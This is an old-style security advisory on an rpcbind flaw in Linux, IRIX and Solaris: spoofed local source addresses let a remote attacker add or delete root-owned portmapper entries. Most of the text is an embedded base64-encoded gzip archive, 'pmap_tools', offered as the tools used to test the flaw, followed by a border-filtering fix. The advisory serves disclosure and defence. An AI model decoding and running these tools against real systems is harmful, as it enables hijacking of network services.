COMMAND

    rpcbind

SYSTEMS AFFECTED

    Linux (2.0.34), IRIX 6.2, 6.5.2f, 6.5.3f, Wietse's rpcbind 2.1 replacement, Solaris 2.6 (other?)

PROBLEM

    Martin Rosa found following.  Rpcbind permits a remote attacker to
    insert and delete entries  without superuser status by  spoofing a
    source address.  Ironically, it inserts the entries as being owned
    by superuser (wietse's  rpcbind in this  case).  Consequences  are
    terrible,  to  say  the  least.  Tests  were  conducted  with  the
    pmap_tools available at address below.  A source of pmap_tools for
    linux, as well as  technical details concerning this  advisory can
    be obtained here:

        http://www.pgci.ca/emain.html

    Below you will find MIME version of it.

    ---
    Content-Type: application/octet-stream; name="pmap_tools.gz"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="pmap_tools.gz"
    Content-MD5: Hi3VxJoDKcttaTFHFvNMCw==

    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

    -----

SOLUTION

    Make  sure  you  filter  127.0.0.1  and  localnets  at your border
    router.  Bad router hygiene will lead to problems.